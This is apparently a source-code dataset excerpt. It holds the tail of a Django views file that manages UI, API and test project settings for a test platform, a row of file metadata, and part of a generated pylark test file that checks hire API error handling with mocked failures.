    rows = []  # records of the requested page
    try:
        # Total record count, newest order first.
        records = Test_project_setting.objects.all().order_by('-order').values()
        griddata["total"] = len(records)
        page_num = request.GET.get('page')  # requested page number
        rows_num = request.GET.get('rows')  # requested page size
        paginator = Paginator(records, rows_num)
        try:
            page = paginator.page(page_num)
        except PageNotAnInteger as e:
            # Non-integer page number: return the first page.
            # logger.warn is deprecated (removed in Python 3.13); use warning.
            logger.warning('%s' % e)
            page = paginator.page(1)
        except EmptyPage as e:
            # Page number out of range: return the last page.
            logger.warning('%s' % e)
            page = paginator.page(paginator.num_pages)
        for obj in page.object_list:
            rows.append(obj)
        griddata["rows"] = rows
        griddata = json.dumps(griddata)
        return HttpResponse(griddata)
    except Exception as e:
        logger.error('%s' % e)
        return HttpResponse('%s' % e)
# 新增
def add_ui_project_setting(request):
    """Create a UI project setting, appending or inserting by order.

    An empty ``order`` appends the record after the current maximum;
    otherwise the record is inserted at ``order`` and later records are
    shifted down inside a transaction.  After the record exists, the
    matching page-tree / case-tree root rows are created and the record
    becomes the default selection for any tree that has none yet.
    Returns 'success' or a validation/error message.
    """
    try:
        params = request.POST
        project_name = params['project_name']
        home_page = params['home_page']
        environment = params['environment']
        environment_id = params['environment_id']
        valid_flag = params['valid_flag']
        order = params['order']
        if not project_name:
            return HttpResponse('项目名称不能为空')
        elif UI_project_setting.objects.filter(project_name=project_name).exists():
            return HttpResponse('项目名称(%s)已存在' % project_name)
        if not home_page:
            return HttpResponse('项目主页不能为空')
        if not environment:
            return HttpResponse('所属环境不能为空')
        if not valid_flag:
            return HttpResponse('是否启用不能为空')
        if order == '':  # empty order: append after the current maximum
            all_objects = UI_project_setting.objects.all()
            if all_objects.exists():
                max_order = all_objects.aggregate(Max('order'))['order__max']
                order = max_order + 1
            else:
                order = 1
            obj = UI_project_setting(project_name=project_name, home_page=home_page, environment=environment, environment_id=environment_id, valid_flag=valid_flag, order=order)
            obj.save()
        else:  # explicit order: insert and shift every later record by one
            try:
                with transaction.atomic():
                    all_objects = UI_project_setting.objects.filter(order__gte=order)
                    for item in all_objects:
                        item.order = item.order + 1
                        item.save()
                    obj = UI_project_setting(project_name=project_name, home_page=home_page, environment=environment, environment_id=environment_id, valid_flag=valid_flag, order=order)
                    obj.save()
            except Exception as e:
                logger.error('%s' % e)
                return HttpResponse('%s' % e)
        # Common bookkeeping, run exactly once for both branches.
        # BUG FIX: the insert branch previously also ran this block inside
        # the transaction, creating duplicate Page_tree / UI_case_tree roots.
        project_id = UI_project_setting.objects.filter(project_name=project_name).values()[0]['id']
        # Root node of the UI page tree for this project.
        obj = Page_tree(text=project_name, state='open', parent_id=0, iconCls='', attributes='', project_id=project_id, order=1)
        obj.save()
        # Root node of the UI case tree for this project.
        obj = UI_case_tree(text=project_name, state='open', parent_id=0, iconCls='', attributes='', project_id=project_id, order=1)
        obj.save()
        # Make this project the default selection for any tree without one.
        if not Project_chosen.objects.filter(tree_type='PageTree').exists():
            obj = Project_chosen(project_name=project_name, tree_type='PageTree', project_id=project_id)
            obj.save()
        if not Project_chosen.objects.filter(tree_type='UICaseTree').exists():
            obj = Project_chosen(project_name=project_name, tree_type='UICaseTree', project_id=project_id)
            obj.save()
        if not Project_chosen.objects.filter(tree_type='PlanUICaseTree').exists():
            obj = Project_chosen(project_name=project_name, tree_type='PlanUICaseTree', project_id=project_id)
            obj.save()
        return HttpResponse('success')
    except Exception as e:
        logger.error('%s' % e)
        return HttpResponse('%s' % e)
# 新增
def add_api_project_setting(request):
    """Create an API project setting, appending or inserting by order.

    Validates name uniqueness, protocol (http/https) and port (digits;
    defaults to 80 for http).  An empty ``order`` appends after the
    current maximum; otherwise the record is inserted at ``order`` and
    later records are shifted down inside a transaction.  Afterwards the
    API case-tree root row is created and the record becomes the default
    selection for any tree that has none yet.
    Returns 'success' or a validation/error message.
    """
    try:
        params = request.POST
        project_name = params['project_name']
        protocol = params['protocol'].strip().lower()
        host = params['host'].strip()
        port = params['port'].strip()
        environment = params['environment']
        environment_id = params['environment_id']
        valid_flag = params['valid_flag']
        order = params['order']
        if not project_name:
            return HttpResponse('项目名称不能为空')
        elif API_project_setting.objects.filter(project_name=project_name).exists():
            return HttpResponse('项目名称(%s)已存在' % project_name)
        if protocol == '':
            return HttpResponse('接口请求协议不能为空')
        elif protocol not in ('https', 'http'):  # non-empty already guaranteed
            return HttpResponse('协议只能是http、https')
        if not host:
            return HttpResponse('主机地址不能为空')
        if not environment:
            return HttpResponse('所属环境不能为空')
        if not valid_flag:
            return HttpResponse('是否启用不能为空')
        if protocol == 'http' and port == '':
            port = 80  # default HTTP port
        elif protocol != 'http' and port == '':
            return HttpResponse('非http协议,端口不能为空')
        elif not port.isdigit():
            return HttpResponse('端口只能为数字')
        if order == '':  # empty order: append after the current maximum
            all_objects = API_project_setting.objects.all()
            if all_objects.exists():
                max_order = all_objects.aggregate(Max('order'))['order__max']
                order = max_order + 1
            else:
                order = 1
            obj = API_project_setting(project_name=project_name, protocol=protocol, host=host, port=port, environment=environment, environment_id=environment_id, valid_flag=valid_flag, order=order)
            obj.save()
        else:  # explicit order: insert and shift every later record by one
            try:
                with transaction.atomic():
                    all_objects = API_project_setting.objects.filter(order__gte=order)
                    for item in all_objects:
                        item.order = item.order + 1
                        item.save()
                    obj = API_project_setting(project_name=project_name, protocol=protocol, host=host, port=port, environment=environment, environment_id=environment_id, valid_flag=valid_flag, order=order)
                    obj.save()
            except Exception as e:
                logger.error('%s' % e)
                return HttpResponse('%s' % e)
        project_id = API_project_setting.objects.filter(project_name=project_name).values()[0]['id']
        # Root node of the API case tree for this project.
        obj = API_case_tree(text=project_name, state='open', parent_id=0, iconCls='', attributes='', project_id=project_id, order=1)
        obj.save()
        # Make this project the default selection for any tree without one.
        if not Project_chosen.objects.filter(tree_type='APICaseTree').exists():
            obj = Project_chosen(project_name=project_name, tree_type='APICaseTree', project_id=project_id)
            obj.save()
        if not Project_chosen.objects.filter(tree_type='PlanAPICaseTree').exists():
            obj = Project_chosen(project_name=project_name, tree_type='PlanAPICaseTree', project_id=project_id)
            obj.save()
        return HttpResponse('success')
    except Exception as e:
        logger.error('%s' % e)
        return HttpResponse('%s' % e)
# 新增
def add_test_project_setting(request):
    """Create a test project setting, appending or inserting by order.

    An empty ``order`` appends the record after the current maximum;
    otherwise the record is inserted at ``order`` and later records are
    shifted down inside a transaction.  Afterwards the sprint-tree root
    row is created and the record becomes the default sprint-tree
    selection if none exists.  Returns 'success' or an error message.
    """
    try:
        params = request.POST
        project_name = params['project_name']
        valid_flag = params['valid_flag']
        order = params['order']
        if not project_name:
            return HttpResponse('项目名称不能为空')
        elif Test_project_setting.objects.filter(project_name=project_name).exists():
            return HttpResponse('项目名称(%s)已存在' % project_name)
        if not valid_flag:
            return HttpResponse('是否启用不能为空')
        if order == '':  # empty order: append after the current maximum
            all_objects = Test_project_setting.objects.all()
            if all_objects.exists():
                max_order = all_objects.aggregate(Max('order'))['order__max']
                order = max_order + 1
            else:
                order = 1
            obj = Test_project_setting(project_name=project_name, valid_flag=valid_flag, order=order)
            obj.save()
        else:  # explicit order: insert and shift every later record by one
            try:
                with transaction.atomic():
                    all_objects = Test_project_setting.objects.filter(order__gte=order)
                    for item in all_objects:
                        item.order = item.order + 1
                        item.save()
                    obj = Test_project_setting(project_name=project_name, valid_flag=valid_flag, order=order)
                    obj.save()
            except Exception as e:
                logger.error('%s' % e)
                return HttpResponse('%s' % e)
        project_id = Test_project_setting.objects.filter(project_name=project_name).values()[0]['id']
        # Root node of the sprint (version iteration) tree for this project.
        obj = Sprint_tree(text=project_name, state='open', parent_id=0, iconCls='', attributes='', project_id=project_id, order=1)
        obj.save()
        # Make this project the default sprint-tree selection if none exists.
        if not Project_chosen.objects.filter(tree_type='SprintTree').exists():
            # BUG FIX: previously inserted tree_type='SringTree' (typo), so the
            # guard above never matched the inserted row.
            obj = Project_chosen(project_name=project_name, tree_type='SprintTree', project_id=project_id)
            obj.save()
        return HttpResponse('success')
    except Exception as e:
        logger.error('%s' % e)
        return HttpResponse('%s' % e)
# 编辑
def edit_ui_project_setting(request):
    """Update one UI project setting and propagate a renamed project to
    every related table that stores the project name.
    """
    try:
        form = request.POST
        record_id = form['id']
        project_name = form['project_name']
        home_page = form['home_page']
        environment = form['environment']
        environment_id = form['environment_id']
        valid_flag = form['valid_flag']
        # Validate required fields; reject a name used by another record.
        if not project_name:
            return HttpResponse('项目名称不能为空')
        elif UI_project_setting.objects.filter(project_name=project_name).exclude(id=record_id).exists():
            return HttpResponse('项目名称(%s)已存在' % project_name)
        if not home_page:
            return HttpResponse('项目主页不能为空')
        if not environment:
            return HttpResponse('所属环境不能为空')
        if not valid_flag:
            return HttpResponse('是否启用不能为空')
        setting = UI_project_setting.objects.get(id=record_id)
        setting.project_name = project_name
        setting.home_page = home_page
        setting.environment = environment
        setting.environment_id = environment_id
        setting.valid_flag = valid_flag
        setting.save()
        # Keep the project name in sync across the database-config table,
        # UI test plans, running plans and the current-selection table
        # (UI-related tree selections only).
        related_querysets = (
            Database_setting.objects.filter(project_type='UI项目').filter(project_id=record_id),
            UI_test_plan.objects.filter(project_id=record_id),
            Running_plan.objects.filter(project_id=record_id),
            Project_chosen.objects.filter(project_id=record_id).exclude(tree_type='SprintTree').exclude(tree_type='APICaseTree').exclude(tree_type='PlanAPICaseTree'),
        )
        for queryset in related_querysets:
            for linked in queryset:
                linked.project_name = project_name
                linked.save()
        return HttpResponse('success')
    except Exception as e:
        logger.error('%s' % e)
        return HttpResponse('%s' % e)
# 编辑
def edit_api_project_setting(request):
    """Update one API project setting and propagate a renamed project to
    every related table that stores the project name.
    """
    try:
        form = request.POST
        record_id = form['id']
        project_name = form['project_name']
        protocol = form['protocol'].strip().lower()
        host = form['host'].strip()
        port = form['port'].strip()
        environment = form['environment']
        environment_id = form['environment_id']
        valid_flag = form['valid_flag']
        # Validate required fields; reject a name used by another record.
        if not project_name:
            return HttpResponse('项目名称不能为空')
        elif API_project_setting.objects.filter(project_name=project_name).exclude(id=record_id).exists():
            return HttpResponse('项目名称(%s)已存在' % project_name)
        if not protocol:
            return HttpResponse('接口请求协议不能为空')
        elif protocol not in ('https', 'http'):
            return HttpResponse('协议只能是http、https')
        if not host:
            return HttpResponse('主机地址不能为空')
        if not environment:
            return HttpResponse('所属环境不能为空')
        if not valid_flag:
            return HttpResponse('是否启用不能为空')
        # Port rules: http may omit the port (defaults to 80); any other
        # protocol requires one, and a given port must be numeric.
        if protocol == 'http' and port == '':
            port = 80
        elif protocol != 'http' and port == '':
            return HttpResponse('非http协议,端口不能为空')
        elif not port.isdigit():
            return HttpResponse('端口只能为数字')
        setting = API_project_setting.objects.get(id=record_id)
        setting.project_name = project_name
        setting.protocol = protocol
        setting.host = host
        setting.port = port
        setting.environment = environment
        setting.environment_id = environment_id
        setting.valid_flag = valid_flag
        setting.save()
        # Keep the project name in sync across the database-config table,
        # API test plans, running plans and the current-selection table
        # (API-related tree selections only).
        related_querysets = (
            Database_setting.objects.filter(project_type='API项目').filter(project_id=record_id),
            API_test_plan.objects.filter(project_id=record_id),
            Running_plan.objects.filter(project_id=record_id),
            Project_chosen.objects.filter(project_id=record_id).exclude(tree_type='SprintTree').exclude(tree_type='UICaseTree').exclude(tree_type='PlanUICaseTree').exclude(tree_type='PageTree'),
        )
        for queryset in related_querysets:
            for linked in queryset:
                linked.project_name = project_name
                linked.save()
        return HttpResponse('success')
    except Exception as e:
        logger.error('%s' % e)
        return HttpResponse('%s' % e)
# 编辑
def edit_test_project_setting(request):
    """Update one test project setting and propagate a renamed project
    to the current-selection table.
    """
    try:
        params = request.POST
        id = params['id']
        project_name = params['project_name']
        valid_flag = params['valid_flag']
        if not project_name:
            return HttpResponse('项目名称不能为空')
        # BUG FIX: the duplicate-name check previously queried
        # API_project_setting; this view edits Test_project_setting
        # (matching add_test_project_setting's uniqueness check).
        elif Test_project_setting.objects.filter(project_name=project_name).exclude(id=id).exists():
            return HttpResponse('项目名称(%s)已存在' % project_name)
        if not valid_flag:
            return HttpResponse('是否启用不能为空')
        obj = Test_project_setting.objects.get(id=id)
        obj.project_name = project_name
        obj.valid_flag = valid_flag
        obj.save()
        # Keep the name in sync in the current-selection table
        # (sprint-tree selections only; exclude all UI/API tree types).
        obj_list = Project_chosen.objects.filter(project_id=id).exclude(tree_type='PlanAPICaseTree').exclude(tree_type='APICaseTree').exclude(tree_type='UICaseTree').exclude(tree_type='PlanUICaseTree').exclude(tree_type='PageTree')
        for obj in obj_list:
            obj.project_name = project_name
            obj.save()
        return HttpResponse('success')
    except Exception as e:
        logger.error('%s' % e)
        return HttpResponse('%s' % e)
| 38.420475
| 231
| 0.618291
| 2,381
| 21,016
| 5.257455
| 0.076438
| 0.093146
| 0.053203
| 0.065026
| 0.938808
| 0.928343
| 0.893433
| 0.88177
| 0.879853
| 0.860042
| 0
| 0.002753
| 0.273982
| 21,016
| 547
| 232
| 38.420475
| 0.817669
| 0.061382
| 0
| 0.815789
| 0
| 0
| 0.070731
| 0.005496
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028708
| false
| 0
| 0.047847
| 0
| 0.215311
| 0.011962
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
45029268107518c70d9399a91385aabcbfa18bad
| 34,221
|
py
|
Python
|
tests/test_hire_sample.py
|
chyroc/pylark
|
a54cce6b814935fd3c72668b262b54c8ee461484
|
[
"Apache-2.0"
] | 7
|
2021-08-18T00:42:05.000Z
|
2022-03-14T09:49:15.000Z
|
tests/test_hire_sample.py
|
chyroc/pylark
|
a54cce6b814935fd3c72668b262b54c8ee461484
|
[
"Apache-2.0"
] | null | null | null |
tests/test_hire_sample.py
|
chyroc/pylark
|
a54cce6b814935fd3c72668b262b54c8ee461484
|
[
"Apache-2.0"
] | 1
|
2022-03-14T09:49:20.000Z
|
2022-03-14T09:49:20.000Z
|
# Code generated by lark_sdk_gen. DO NOT EDIT.
import unittest
import pylark
import pytest
from tests.test_conf import app_all_permission, app_no_permission
from tests.test_helper import mock_get_tenant_access_token_failed
def mock(*args, **kwargs):
    """Stand-in API call that always fails with a deterministic error."""
    failure = pylark.PyLarkError(scope="scope", func="func", code=1, msg="mock-failed")
    raise failure
def mock_raw_request(*args, **kwargs):
    """Stand-in raw-request hook that always fails deterministically."""
    failure = pylark.PyLarkError(
        scope="scope",
        func="func",
        code=1,
        msg="mock-raw-request-failed",
    )
    raise failure
# mock get token
class TestHireSampleMockGetTokenFailed(unittest.TestCase):
    """Every hire API call must surface PyLarkError when token fetch fails.

    Each test patches the client's access-token getters with a failing
    mock, calls one hire endpoint with an empty request object, and
    asserts the raised error message contains ``msg=failed``.
    (Generated file — do not restructure by hand.)
    """
    def __init__(self, *args, **kwargs):
        super(TestHireSampleMockGetTokenFailed, self).__init__(*args, **kwargs)
        self.cli = app_all_permission.ins()
        # Both token getters fail, so every request below fails fast.
        self.cli.auth.get_tenant_access_token = mock_get_tenant_access_token_failed
        self.cli.auth.get_app_access_token = mock_get_tenant_access_token_failed
        self.module_cli = self.cli.hire
    def test_mock_get_token_get_hire_job(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_job(pylark.GetHireJobReq())
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_get_hire_job_manager(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_job_manager(pylark.GetHireJobManagerReq())
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_get_hire_talent(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_talent(pylark.GetHireTalentReq())
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_get_hire_attachment(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_attachment(pylark.GetHireAttachmentReq())
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_get_hire_attachment_preview(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_attachment_preview(
                pylark.GetHireAttachmentPreviewReq()
            )
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_get_hire_resume_source(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_resume_source(pylark.GetHireResumeSourceReq())
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_create_hire_note(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.create_hire_note(pylark.CreateHireNoteReq())
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_update_hire_note(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.update_hire_note(pylark.UpdateHireNoteReq())
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_get_hire_note(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_note(pylark.GetHireNoteReq())
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_get_hire_note_list(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_note_list(pylark.GetHireNoteListReq())
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_get_hire_referral_by_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_referral_by_application(
                pylark.GetHireReferralByApplicationReq()
            )
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_get_hire_job_process_list(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_job_process_list(pylark.GetHireJobProcessListReq())
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_create_hire_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.create_hire_application(pylark.CreateHireApplicationReq())
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_terminate_hire_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.terminate_hire_application(
                pylark.TerminateHireApplicationReq()
            )
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_get_hire_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_application(pylark.GetHireApplicationReq())
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_get_hire_application_list(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_application_list(
                pylark.GetHireApplicationListReq()
            )
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_get_hire_application_interview_list(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_application_interview_list(
                pylark.GetHireApplicationInterviewListReq()
            )
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_get_hire_offer_by_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_offer_by_application(
                pylark.GetHireOfferByApplicationReq()
            )
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_get_hire_offer_schema(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_offer_schema(pylark.GetHireOfferSchemaReq())
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_make_hire_transfer_onboard_by_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.make_hire_transfer_onboard_by_application(
                pylark.MakeHireTransferOnboardByApplicationReq()
            )
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_update_hire_employee(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.update_hire_employee(pylark.UpdateHireEmployeeReq())
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_get_hire_employee_by_application(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_employee_by_application(
                pylark.GetHireEmployeeByApplicationReq()
            )
        assert "msg=failed" in f"{e}"
    def test_mock_get_token_get_hire_employee(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_employee(pylark.GetHireEmployeeReq())
        assert "msg=failed" in f"{e}"
# mock mock self func
class TestHireSampleMockSelfFuncFailed(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestHireSampleMockSelfFuncFailed, self).__init__(*args, **kwargs)
self.cli = app_all_permission.ins()
self.module_cli = self.cli.hire
def test_mock_self_func_get_hire_job(self):
origin_func = self.module_cli.get_hire_job
self.module_cli.get_hire_job = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_job(pylark.GetHireJobReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_job = origin_func
def test_mock_self_func_get_hire_job_manager(self):
origin_func = self.module_cli.get_hire_job_manager
self.module_cli.get_hire_job_manager = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_job_manager(pylark.GetHireJobManagerReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_job_manager = origin_func
def test_mock_self_func_get_hire_talent(self):
origin_func = self.module_cli.get_hire_talent
self.module_cli.get_hire_talent = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_talent(pylark.GetHireTalentReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_talent = origin_func
def test_mock_self_func_get_hire_attachment(self):
origin_func = self.module_cli.get_hire_attachment
self.module_cli.get_hire_attachment = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_attachment(pylark.GetHireAttachmentReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_attachment = origin_func
def test_mock_self_func_get_hire_attachment_preview(self):
origin_func = self.module_cli.get_hire_attachment_preview
self.module_cli.get_hire_attachment_preview = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_attachment_preview(
pylark.GetHireAttachmentPreviewReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_attachment_preview = origin_func
def test_mock_self_func_get_hire_resume_source(self):
origin_func = self.module_cli.get_hire_resume_source
self.module_cli.get_hire_resume_source = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_resume_source(pylark.GetHireResumeSourceReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_resume_source = origin_func
def test_mock_self_func_create_hire_note(self):
origin_func = self.module_cli.create_hire_note
self.module_cli.create_hire_note = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_hire_note(pylark.CreateHireNoteReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.create_hire_note = origin_func
def test_mock_self_func_update_hire_note(self):
origin_func = self.module_cli.update_hire_note
self.module_cli.update_hire_note = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_hire_note(pylark.UpdateHireNoteReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.update_hire_note = origin_func
def test_mock_self_func_get_hire_note(self):
origin_func = self.module_cli.get_hire_note
self.module_cli.get_hire_note = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_note(pylark.GetHireNoteReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_note = origin_func
def test_mock_self_func_get_hire_note_list(self):
origin_func = self.module_cli.get_hire_note_list
self.module_cli.get_hire_note_list = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_note_list(pylark.GetHireNoteListReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_note_list = origin_func
def test_mock_self_func_get_hire_referral_by_application(self):
origin_func = self.module_cli.get_hire_referral_by_application
self.module_cli.get_hire_referral_by_application = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_referral_by_application(
pylark.GetHireReferralByApplicationReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_referral_by_application = origin_func
def test_mock_self_func_get_hire_job_process_list(self):
origin_func = self.module_cli.get_hire_job_process_list
self.module_cli.get_hire_job_process_list = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_job_process_list(pylark.GetHireJobProcessListReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_job_process_list = origin_func
def test_mock_self_func_create_hire_application(self):
origin_func = self.module_cli.create_hire_application
self.module_cli.create_hire_application = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_hire_application(pylark.CreateHireApplicationReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.create_hire_application = origin_func
def test_mock_self_func_terminate_hire_application(self):
origin_func = self.module_cli.terminate_hire_application
self.module_cli.terminate_hire_application = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.terminate_hire_application(
pylark.TerminateHireApplicationReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.terminate_hire_application = origin_func
def test_mock_self_func_get_hire_application(self):
origin_func = self.module_cli.get_hire_application
self.module_cli.get_hire_application = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_application(pylark.GetHireApplicationReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_application = origin_func
def test_mock_self_func_get_hire_application_list(self):
origin_func = self.module_cli.get_hire_application_list
self.module_cli.get_hire_application_list = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_application_list(
pylark.GetHireApplicationListReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_application_list = origin_func
def test_mock_self_func_get_hire_application_interview_list(self):
origin_func = self.module_cli.get_hire_application_interview_list
self.module_cli.get_hire_application_interview_list = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_application_interview_list(
pylark.GetHireApplicationInterviewListReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_application_interview_list = origin_func
def test_mock_self_func_get_hire_offer_by_application(self):
origin_func = self.module_cli.get_hire_offer_by_application
self.module_cli.get_hire_offer_by_application = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_offer_by_application(
pylark.GetHireOfferByApplicationReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_offer_by_application = origin_func
def test_mock_self_func_get_hire_offer_schema(self):
origin_func = self.module_cli.get_hire_offer_schema
self.module_cli.get_hire_offer_schema = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_offer_schema(pylark.GetHireOfferSchemaReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_offer_schema = origin_func
def test_mock_self_func_make_hire_transfer_onboard_by_application(self):
origin_func = self.module_cli.make_hire_transfer_onboard_by_application
self.module_cli.make_hire_transfer_onboard_by_application = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.make_hire_transfer_onboard_by_application(
pylark.MakeHireTransferOnboardByApplicationReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.make_hire_transfer_onboard_by_application = origin_func
def test_mock_self_func_update_hire_employee(self):
origin_func = self.module_cli.update_hire_employee
self.module_cli.update_hire_employee = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_hire_employee(pylark.UpdateHireEmployeeReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.update_hire_employee = origin_func
def test_mock_self_func_get_hire_employee_by_application(self):
origin_func = self.module_cli.get_hire_employee_by_application
self.module_cli.get_hire_employee_by_application = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_employee_by_application(
pylark.GetHireEmployeeByApplicationReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_employee_by_application = origin_func
def test_mock_self_func_get_hire_employee(self):
origin_func = self.module_cli.get_hire_employee
self.module_cli.get_hire_employee = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_employee(pylark.GetHireEmployeeReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_employee = origin_func
# mock raw request
class TestHireSampleMockRawRequestFailed(unittest.TestCase):
    """Hire API tests with the client's transport layer replaced by a failing mock.

    Each test calls one hire wrapper and asserts that the transport error
    surfaces as a pylark.PyLarkError whose message contains
    "mock-raw-request-failed" — i.e. wrappers propagate low-level failures
    instead of swallowing them.
    """
    def __init__(self, *args, **kwargs):
        super(TestHireSampleMockRawRequestFailed, self).__init__(*args, **kwargs)
        self.cli = app_all_permission.ins()
        self.module_cli = self.cli.hire
        # Patch the raw transport so every request fails deterministically.
        self.cli.raw_request = mock_raw_request
    def test_mock_raw_request_get_hire_job(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_job(
                pylark.GetHireJobReq(
                    job_id=1,
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_get_hire_job_manager(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_job_manager(
                pylark.GetHireJobManagerReq(
                    job_id="x",
                    manager_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_get_hire_talent(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_talent(
                pylark.GetHireTalentReq(
                    talent_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_get_hire_attachment(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_attachment(
                pylark.GetHireAttachmentReq(
                    attachment_id="x",
                )
            )
        assert e.type is pylark.PyLarkError
        assert e.value.code > 0
        assert "mock-raw-request-failed" in e.value.msg
    def test_mock_raw_request_get_hire_attachment_preview(self):
        with pytest.raises(pylark.PyLarkError) as e:
            self.module_cli.get_hire_attachment_preview(
                pylark.GetHireAttachmentPreviewReq(
